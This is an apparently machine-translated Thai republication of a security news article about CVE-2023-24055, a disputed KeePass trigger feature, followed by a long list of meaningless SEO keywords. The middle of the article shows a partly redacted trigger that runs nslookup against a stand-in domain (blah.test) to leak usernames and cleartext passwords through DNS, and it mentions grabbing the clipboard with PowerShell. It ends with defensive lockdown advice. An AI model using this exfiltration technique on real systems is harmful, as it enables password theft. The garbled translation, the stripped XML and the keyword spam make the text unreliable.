เป็นเวลาสองสามสัปดาห์ที่น่าสนใจสำหรับผู้จัดการรหัสผ่าน – ยูทิลิตี้ที่มีประโยชน์เหล่านี้ช่วยให้คุณสร้างรหัสผ่านที่แตกต่างกันสำหรับทุกเว็บไซต์ที่คุณใช้ จากนั้นจึงติดตามรหัสผ่านเหล่านั้นทั้งหมด
ในตอนท้ายของปี 2022 ก็ถึงคราวที่ LastPass จะกลายเป็นข่าวไปทั่ว เมื่อบริษัทยอมรับในที่สุดว่าการละเมิดที่เกิดขึ้นในเดือนสิงหาคม 2022 นั้นจบลงด้วยรหัสผ่านของลูกค้า ห้องใต้ดินถูกขโมย จากบริการคลาวด์ที่สำรองไว้
(รหัสผ่านเองไม่ได้ถูกขโมย เนื่องจากห้องนิรภัยถูกเข้ารหัส และ LastPass ไม่มีสำเนาของ "มาสเตอร์คีย์" ของใครก็ตามสำหรับไฟล์ห้องนิรภัยสำรองข้อมูล แต่เป็นการโกนที่ใกล้เคียงกว่าที่คนส่วนใหญ่ยินดีที่ได้ยิน)
จากนั้นก็ถึงคราวที่ LifeLock จะต้องเป็นข่าวเมื่อบริษัทเตือนเกี่ยวกับสิ่งที่ดูเหมือนเป็นผื่น การโจมตีด้วยการเดารหัสผ่านอาจอิงตามรหัสผ่านที่ขโมยมาจากเว็บไซต์อื่นโดยสิ้นเชิง อาจเป็นเพราะเมื่อนานมาแล้ว และอาจซื้อจากเว็บมืดเมื่อไม่นานนี้
LifeLock เองไม่ได้ถูกละเมิด แต่ผู้ใช้บางรายมีพฤติกรรมการแบ่งปันรหัสผ่านที่เกิดจากความเสี่ยงที่พวกเขาอาจจำไม่ได้ด้วยซ้ำว่าเคยดำเนินการไปแล้ว
คู่แข่งอย่าง 1Password และ BitWarden ก็ตกเป็นข่าวเช่นกันเมื่อเร็วๆ นี้ โดยอ้างอิงจากรายงานของโฆษณาที่เป็นอันตราย ซึ่งเห็นได้ชัดว่าออกอากาศโดย Google โดยไม่เจตนา ซึ่งหลอกล่อผู้ใช้ให้ไปยังหน้าเข้าสู่ระบบจำลองที่มีเป้าหมายเพื่อฟิชชิงรายละเอียดบัญชีของพวกเขา
ตอนนี้ถึงคิวของ KeePass แล้ว ในข่าวคราวนี้สำหรับปัญหาความปลอดภัยทางไซเบอร์อื่น: ที่ถูกกล่าวหา ความอ่อนแอซึ่งเป็นคำศัพท์เฉพาะที่ใช้สำหรับจุดบกพร่องของซอฟต์แวร์ที่นำไปสู่ช่องโหว่ด้านความปลอดภัยในโลกไซเบอร์ที่ผู้โจมตีอาจนำไปใช้เพื่อจุดประสงค์ที่ชั่วร้ายได้
การดมรหัสผ่านทำได้ง่าย
เราเรียกมันว่า ความอ่อนแอ ที่นี่ เพราะมันมีตัวระบุจุดบกพร่องอย่างเป็นทางการ ซึ่งออกโดย US National Institute for Standards and Technology
บั๊กได้รับการขนานนามว่า CVE-2023-24055: ผู้โจมตีที่มีสิทธิ์ในการเขียนไฟล์คอนฟิกูเรชัน XML [สามารถ] รับรหัสผ่านข้อความที่ชัดเจนโดยเพิ่มทริกเกอร์การส่งออก
การอ้างสิทธิ์เกี่ยวกับการรับรหัสผ่านแบบเคลียร์เท็กซ์นั้นเป็นเรื่องจริง
หากฉันมีสิทธิ์ในการเขียนไฟล์ส่วนตัวของคุณ รวมถึงสิ่งที่เรียกว่า %APPDATA%
ไดเร็กทอรี ฉันสามารถแอบปรับแต่งส่วนการกำหนดค่าเพื่อแก้ไขการตั้งค่า KeePass ใดๆ ที่คุณกำหนดเองแล้ว หรือเพื่อเพิ่มการปรับแต่งหากคุณไม่ได้เปลี่ยนแปลงอะไรโดยรู้เท่าทัน...
…และฉันสามารถขโมยรหัสผ่านข้อความธรรมดาของคุณอย่างง่ายดายอย่างน่าประหลาดใจ ไม่ว่าจะเป็นแบบจำนวนมาก เช่น โดยการทิ้งฐานข้อมูลทั้งหมดเป็นไฟล์ CSV ที่ไม่ได้เข้ารหัส หรือเมื่อคุณใช้รหัสผ่าน เช่น โดยการตั้งค่า “ตะขอของโปรแกรม” ที่ทริกเกอร์ทุกครั้งที่คุณเข้าถึง รหัสผ่านจากฐานข้อมูล
โปรดทราบว่าฉันไม่ต้องการ ผู้บริหาร สิทธิพิเศษ เนื่องจากฉันไม่ต้องวุ่นวายกับไดเร็กทอรีการติดตั้งจริงที่จัดเก็บแอป KeePass ซึ่งโดยทั่วไปแล้วจะไม่อนุญาตสำหรับผู้ใช้ทั่วไป
และฉันไม่ต้องการเข้าถึงการตั้งค่าการกำหนดค่าส่วนกลางที่ถูกล็อก
สิ่งที่น่าสนใจคือ KeePass พยายามอย่างเต็มที่ที่จะหยุดไม่ให้รหัสผ่านของคุณถูกดักฟังเมื่อคุณใช้งาน รวมถึงการใช้เทคนิคการป้องกันการงัดแงะเพื่อหยุดกลอุบายป้องกันคีย์ล็อกเกอร์ต่างๆ แม้กระทั่งจากผู้ใช้ที่มีอำนาจการดูแลระบบอยู่แล้ว
แต่ซอฟต์แวร์ KeePass ยังช่วยให้การบันทึกข้อมูลรหัสผ่านแบบข้อความล้วนเป็นเรื่องง่ายอย่างน่าประหลาดใจ บางทีคุณอาจมองว่า “ง่ายเกินไป” แม้กระทั่งสำหรับผู้ที่ไม่ใช่ผู้ดูแลระบบ
ใช้เวลาเพียงไม่กี่นาทีในการใช้ KeePass GUI เพื่อสร้างไฟล์ ทริกเกอร์ เหตุการณ์ให้ทำงานทุกครั้งที่คุณคัดลอกรหัสผ่านลงในคลิปบอร์ด และตั้งค่าให้เหตุการณ์นั้นทำการค้นหา DNS ที่มีทั้งชื่อผู้ใช้และรหัสผ่านข้อความธรรมดาที่เป็นปัญหา:
จากนั้น เราสามารถคัดลอกการตั้งค่า XML ที่ไม่ชัดเจนมากสำหรับตัวเลือกนั้นจากไฟล์การกำหนดค่าในเครื่องของเราไปยังไฟล์การกำหนดค่าของผู้ใช้รายอื่นในระบบ หลังจากนั้นพวกเขาจะพบว่ารหัสผ่านของพวกเขารั่วไหลทางอินเทอร์เน็ตผ่านการค้นหา DNS
แม้ว่าข้อมูลการกำหนดค่า XML ส่วนใหญ่จะอ่านได้และให้ข้อมูลได้ แต่ KeePass ก็ใช้สตริงข้อมูลแบบสุ่มที่เรียกว่า GUID (ย่อมาจาก ตัวระบุที่ไม่ซ้ำกันทั่วโลก) เพื่อแสดงถึงความแตกต่าง ทริกเกอร์ การตั้งค่า ดังนั้นแม้แต่ผู้ใช้ที่มีข้อมูลดีก็ยังต้องการรายการอ้างอิงที่กว้างขวางเพื่อให้เข้าใจได้ว่ามีการตั้งค่าทริกเกอร์ใดและอย่างไร
ทริกเกอร์การรั่วไหลของ DNS ของเรามีลักษณะดังนี้ แม้ว่าเราจะแก้ไขรายละเอียดบางส่วนแล้ว ดังนั้นคุณจึงไม่สามารถรับมือกับความเสียหายได้ทันทีเพียงแค่คัดลอกและวางข้อความนี้โดยตรง:
XXXXXXXXXXXXXXXXXXXXX สำเนา ขโมยข้อมูลผ่านการค้นหา DNS XXXXXXXXXXXXXXXXXXXXX 0XXXXXXXXXXXXXXXXXXXXX nslookup XXXXX.XXXXX.blah.test จริง 1
เมื่อเปิดใช้งานทริกเกอร์นี้ การเข้าถึงรหัสผ่าน KeePass ทำให้ข้อความธรรมดารั่วไหลในการค้นหา DNS ที่ไม่เป็นการรบกวนไปยังโดเมนที่ฉันเลือก ซึ่งก็คือ blah.test
ในตัวอย่างนี้
โปรดทราบว่าผู้โจมตีในชีวิตจริงแทบจะช่วงชิงหรือสร้างความสับสนให้กับข้อความที่ขโมยมา ซึ่งไม่เพียงทำให้ตรวจจับได้ยากขึ้นเมื่อ DNS รั่วไหล แต่ยังดูแลรหัสผ่านที่มีอักขระที่ไม่ใช่ ASCII เช่น ตัวอักษรเน้นเสียงหรืออิโมจิ ที่ไม่สามารถใช้ในชื่อ DNS:
แต่มันเป็นแมลงจริงๆเหรอ?
อย่างไรก็ตาม คำถามที่ยุ่งยากก็คือ “นี่เป็นข้อผิดพลาดจริง ๆ หรือเป็นเพียงคุณสมบัติอันทรงพลังที่อาจถูกนำไปใช้ในทางที่ผิดโดยผู้ที่ต้องการควบคุมไฟล์ส่วนตัวของคุณอย่างน้อยเท่ากับที่คุณควบคุมเอง”
พูดง่ายๆ ก็คือมีช่องโหว่หรือไม่หากคนที่ควบคุมบัญชีของคุณอยู่แล้วสามารถเข้าไปยุ่งกับไฟล์ต่างๆ ที่บัญชีของคุณควรจะเข้าถึงได้
แม้ว่าคุณอาจหวังว่าโปรแกรมจัดการ pssword จะมีการป้องกันการปลอมแปลงหลายชั้นเป็นพิเศษ เพื่อทำให้บั๊ก/คุณสมบัติประเภทนี้ถูกใช้งานในทางที่ผิดได้ยากขึ้น CVE-2023-24055 เป็นช่องโหว่ในรายการ CVE จริงหรือ
ถ้าเป็นเช่นนั้นจะไม่สั่งเช่น DEL
(ลบไฟล์) และ FORMAT
ต้องเป็น “โรคจิต” ด้วยเหรอ?
และจะไม่มีการมีอยู่จริงของ PowerShell ซึ่งทำให้พฤติกรรมที่อาจเป็นอันตรายสามารถกระตุ้นได้ง่ายกว่ามาก (ลอง powerhsell get-clipboard
ตัวอย่างเช่น) เป็นช่องโหว่ทั้งหมดหรือไม่
นั่นคือตำแหน่งของ KeePass ซึ่งได้รับการตอบรับจากข้อความต่อไปนี้ซึ่งถูกเพิ่มลงใน รายละเอียด "จุดบกพร่อง" บนเว็บไซต์ของ NIST:
** ข้อพิพาท ** […] หมายเหตุ: ตำแหน่งของผู้ขายคือฐานข้อมูลรหัสผ่านไม่ได้มีวัตถุประสงค์เพื่อความปลอดภัยจากผู้โจมตีที่มีสิทธิ์เข้าถึงพีซีภายในเครื่องในระดับนั้น
จะทำอย่างไร?
หากคุณเป็นผู้ใช้ KeePass แบบสแตนด์อโลน คุณสามารถตรวจสอบทริกเกอร์อันธพาล เช่น “DNS Stealer” ที่เราสร้างขึ้นด้านบนได้โดยการเปิดแอป KeePass และอ่าน เครื่องมือ > ทริกเกอร์… หน้าต่าง:
โปรดทราบว่าคุณสามารถหมุนทั้งหมดได้ ทริกเกอร์ ระบบออกจากหน้าต่างนี้ เพียงยกเลิกการเลือก [ ] Enable trigger system
ตัวเลือก…
…แต่นั่นไม่ใช่การตั้งค่าส่วนกลาง ดังนั้นจึงสามารถเปิดใช้งานได้อีกครั้งผ่านไฟล์กำหนดค่าในเครื่องของคุณ ดังนั้นจึงปกป้องคุณจากความผิดพลาดเท่านั้น แทนที่จะป้องกันจากผู้โจมตีที่เข้าถึงบัญชีของคุณ
คุณสามารถบังคับปิดตัวเลือกนี้สำหรับทุกคนบนคอมพิวเตอร์ โดยไม่มีตัวเลือกให้พวกเขาเปิดใช้อีกครั้งด้วยตนเอง โดยการแก้ไขไฟล์ "ล็อคดาวน์" ส่วนกลาง KeePass.config.enforced.XML
ที่พบในไดเร็กทอรีที่ติดตั้งโปรแกรมแอปเอง
ทริกเกอร์จะถูกปิดสำหรับทุกคนหากไฟล์การบังคับใช้ XML ส่วนกลางของคุณมีลักษณะดังนี้:
เท็จ
(ในกรณีที่คุณสงสัย ผู้โจมตีที่มีสิทธิ์เขียนไปยังไดเร็กทอรีของแอปพลิเคชันเพื่อย้อนกลับการเปลี่ยนแปลงนี้ เกือบจะแน่นอนว่ามีพลังงานระดับระบบเพียงพอที่จะแก้ไขไฟล์สั่งการ KeePass เอง หรือติดตั้งและเปิดใช้งานคีย์ล็อกเกอร์แบบสแตนด์อโลนอยู่ดี)
หากคุณเป็นผู้ดูแลระบบเครือข่ายที่ได้รับมอบหมายให้ล็อก KeePass ในคอมพิวเตอร์ของผู้ใช้เพื่อให้ยังคงมีความยืดหยุ่นเพียงพอที่จะช่วยเหลือพวกเขา แต่ไม่ยืดหยุ่นพอที่จะช่วยเหลืออาชญากรไซเบอร์โดยไม่ได้ตั้งใจ เราขอแนะนำให้อ่าน KeePass ปัญหาด้านความปลอดภัย หน้า, ทริกเกอร์ หน้าและ การกำหนดค่าบังคับ หน้า.
- เนื้อหาที่ขับเคลื่อนด้วย SEO และการเผยแพร่ประชาสัมพันธ์ รับการขยายวันนี้
- เพลโตบล็อคเชน Web3 Metaverse ข่าวกรอง ขยายความรู้. เข้าถึงได้ที่นี่.
- ที่มา: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- สามารถ
- เกี่ยวกับเรา
- ข้างบน
- แน่นอน
- เข้า
- การเข้าถึง
- ลงชื่อเข้าใช้
- คล่องแคล่ว
- ที่เพิ่ม
- ที่ยอมรับ
- โฆษณา
- หลังจาก
- กับ
- ทั้งหมด
- ถูกกล่าวหา
- แล้ว
- และ
- อื่น
- app
- การใช้งาน
- สิงหาคม
- ผู้เขียน
- รถยนต์
- กลับ
- ถอย
- background-image
- สำรอง
- ตาม
- เพราะ
- กำลัง
- ชายแดน
- ด้านล่าง
- ช่องโหว่
- Bug
- เป็นโรคจิต
- จับ
- ซึ่ง
- กรณี
- ที่เกิดจาก
- สาเหตุที่
- ศูนย์
- อย่างแน่นอน
- เปลี่ยนแปลง
- อักขระ
- ตรวจสอบ
- ทางเลือก
- ข้อเรียกร้อง
- ใกล้ชิด
- เมฆ
- สี
- อย่างไร
- บริษัท
- อย่างสมบูรณ์
- คอมพิวเตอร์
- คอมพิวเตอร์
- เงื่อนไข
- องค์ประกอบ
- พิจารณา
- ควบคุม
- สำเนา
- ได้
- หน้าปก
- สร้าง
- ที่สร้างขึ้น
- คฟ
- อาชญากรไซเบอร์
- cybersecurity
- Dangerous
- มืด
- Dark Web
- ข้อมูล
- ฐานข้อมูล
- รายละเอียด
- DID
- ต่าง
- โดยตรง
- แสดง
- DNS
- โดเมน
- Dont
- ลง
- ขนานนามว่า
- ง่ายดาย
- อย่างง่ายดาย
- ทั้ง
- ที่มีการเข้ารหัส
- การบังคับใช้
- พอ
- ทั้งหมด
- แม้
- เหตุการณ์
- ทุกๆ
- ทุกคน
- ตัวอย่าง
- เอาเปรียบ
- ส่งออก
- กว้างขวาง
- พิเศษ
- ลักษณะ
- สองสาม
- เนื้อไม่มีมัน
- ไฟล์
- ในที่สุด
- หา
- มีความยืดหยุ่น
- ดังต่อไปนี้
- บังคับ
- พบ
- ราคาเริ่มต้นที่
- ได้รับ
- ได้รับ
- เหตุการณ์ที่
- ไป
- มีประโยชน์
- มีความสุข
- มี
- ความสูง
- ช่วย
- โปรดคลิกที่นี่เพื่ออ่านรายละเอียดเพิ่มเติม
- หลุม
- ความหวัง
- โฉบ
- สรุป ความน่าเชื่อถือของ Olymp Trade?
- อย่างไรก็ตาม
- HTML
- HTTPS
- ระบุ
- ทันที
- in
- ประกอบด้วย
- รวม
- รวมทั้ง
- ให้ข้อมูล
- ติดตั้ง
- ตัวอย่าง
- สถาบัน
- อินเทอร์เน็ต
- ปัญหา
- ทุนที่ออก
- IT
- ตัวเอง
- ศัพท์แสง
- เก็บ
- ที่รู้จักกัน
- ส่วนใหญ่
- LastPass
- ชั้น
- นำ
- รั่วไหล
- การรั่วไหล
- ชั้น
- รายการ
- ในประเทศ
- มอง
- LOOKS
- ค้นหา
- ทำ
- ทำ
- ทำให้
- ผู้จัดการ
- ผู้จัดการ
- ขอบ
- ความกว้างสูงสุด
- อาจ
- ข้อผิดพลาด
- ความผิดพลาด
- แก้ไข
- มากที่สุด
- ชื่อ
- แห่งชาติ
- จำเป็นต้อง
- เครือข่าย
- ข่าว
- NIST
- ปกติ
- ได้รับ
- เป็นทางการ
- การเปิด
- ตัวเลือกเสริม (Option)
- มิฉะนั้น
- ของตนเอง
- พารามิเตอร์
- รหัสผ่าน
- รหัสผ่าน
- พอล
- PC
- คน
- บางที
- ส่วนบุคคล
- ฟิชชิ่ง
- ข้อความธรรมดา
- เพลโต
- เพลโตดาต้าอินเทลลิเจนซ์
- เพลโตดาต้า
- ตำแหน่ง
- โพสต์
- ที่อาจเกิดขึ้น
- อำนาจ
- ที่มีประสิทธิภาพ
- อำนาจ
- PowerShell
- ส่วนตัว
- สิทธิ์
- อาจ
- โครงการ
- ซื้อ
- วัตถุประสงค์
- ใส่
- คำถาม
- สุ่ม
- ผื่น
- การอ่าน
- เมื่อเร็ว ๆ นี้
- แนะนำ
- ปกติ
- จำ
- แบบจำลอง
- รายงาน
- รายงาน
- ย้อนกลับ
- ความเสี่ยง
- วิ่ง
- Section
- ปลอดภัย
- ความรู้สึก
- บริการ
- ชุด
- การตั้งค่า
- การตั้งค่า
- สั้น
- น่า
- ง่ายดาย
- So
- ซอฟต์แวร์
- ของแข็ง
- บาง
- บางคน
- จุด
- สแตนด์อโลน
- มาตรฐาน
- ยังคง
- ที่ถูกขโมย
- หยุด
- เก็บไว้
- อย่างเช่น
- ควร
- SVG
- ระบบ
- เอา
- เทคนิค
- เทคโนโลยี
- พื้นที่
- ของพวกเขา
- ตัวเอง
- ดังนั้น
- ตลอด
- เวลา
- ไปยัง
- เกินไป
- ด้านบน
- ลู่
- การเปลี่ยนแปลง
- โปร่งใส
- เรียก
- จริง
- กลับ
- หัน
- เป็นปกติ
- เป็นเอกลักษณ์
- URL
- us
- ใช้
- ผู้ใช้งาน
- ผู้ใช้
- ยูทิลิตี้
- ต่างๆ
- หกคะเมน
- ห้องใต้ดิน
- ผ่านทาง
- ความอ่อนแอ
- W3
- วิธี
- เว็บ
- Website
- สัปดาห์ที่ผ่านมา
- อะไร
- ที่
- WHO
- จะ
- สงสัย
- งาน
- จะ
- เขียน
- XML
- ของคุณ
- ด้วยตัวคุณเอง
- ลมทะเล